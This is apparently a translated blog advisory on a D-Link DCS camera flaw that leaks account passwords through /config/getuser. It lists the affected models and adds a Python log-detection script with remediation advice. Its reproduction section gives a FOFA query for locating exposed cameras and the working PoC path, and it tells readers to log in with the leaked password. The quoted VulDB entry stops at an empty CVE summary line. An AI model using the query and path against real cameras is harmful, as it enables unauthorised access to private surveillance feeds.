D-Link DCS password leak vulnerability

D-Link DCS-2200 is a color network surveillance camera.

D-Link DCS series cameras disclose account and password information when a specific URL is accessed. An attacker can use the vulnerability to enter the management backend and reach the video monitoring page.

The original VulDB entry reads as follows:

A vulnerability, which was classified as problematic, was found in D-Link DCS-2530L and DCS-2670L (the affected version unknown). This affects some unknown processing of the file /config/getuser. The manipulation with an unknown input leads to an information disclosure vulnerability (Password). CWE is classifying the issue as CWE-200. This is going to have an impact on confidentiality. The summary by CVE is:

Affected versions:

DCS-2530L, DCS-2670L, DCS-4603, DCS-4622, DCS-4701E, DCS-4703E, DCS-4705E, DCS-4802E, DCS-P703

Vulnerability reproduction:

fofa search:

app="D_Link-DCS-4622" (any of the affected models listed above can be used)

Use the PoC path below to check whether the account and password are returned, then log in with the password obtained.

/config/getuser?index=0
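
Requests to this path can be flagged from the defender's side in web or proxy access logs. The following is an added example, not part of the original post: it assumes the cameras sit behind a reverse proxy that writes combined-format access logs, and the function names and log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote, parse_qs

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
SENSITIVE_PATH = "/config/getuser"  # path named in the advisory text


def normalize_path(target):
    """Decode percent-encoding, collapse duplicate slashes and lowercase,
    so log matching does not depend on how the request was spelled."""
    path = unquote(urlsplit(target).path)
    return re.sub(r"/{2,}", "/", path).rstrip("/").lower()


def find_getuser_hits(lines):
    """Return {source_ip: [event, ...]} for requests to the sensitive path.
    'exposed' is True when the response status was 200 (the device answered)."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalize_path(m["target"]) != SENSITIVE_PATH:
            continue
        query = parse_qs(urlsplit(m["target"]).query)
        hits[m["ip"]].append({
            "time": m["ts"],
            "index": query.get("index", [None])[0],
            "exposed": m["status"] == "200",
        })
    return dict(hits)


# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Jun/2023:10:01:02 +0000] "GET /config/getuser?index=0 HTTP/1.1" 200 58 "-" "curl/7.88"',
    '198.51.100.7 - - [20/Jun/2023:10:01:03 +0000] "GET /config//getuser?index=1 HTTP/1.1" 200 12 "-" "curl/7.88"',
    '203.0.113.9 - - [20/Jun/2023:10:05:00 +0000] "GET /%63onfig/getuser?index=0 HTTP/1.1" 401 0 "-" "-"',
    '192.0.2.20 - - [20/Jun/2023:10:06:00 +0000] "GET /video/live.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_getuser_hits(SAMPLE_LOG).items():
        exposed = sum(e["exposed"] for e in events)
        print(f"{ip}: {len(events)} request(s), {exposed} answered with 200")
```

Any source with an `exposed` event should be treated as having seen the camera's credentials, so the affected account passwords need to be rotated and the management interface removed from untrusted networks.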

 

Special statement:

Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article are the responsibility of the user himself, and I do not assume any responsibility for this.

The author has the right to modify and interpret this article. If you wish to reprint or disseminate this article, you must ensure the integrity of this article, including the copyright statement and all other contents. Without the permission of the author, the content of this article may not be arbitrarily modified, added to or deleted, and it may not be used for commercial purposes in any way. Do not use it for illegal purposes; it is for learning and reference only.


Origin blog.csdn.net/qq_17754023/article/details/131306224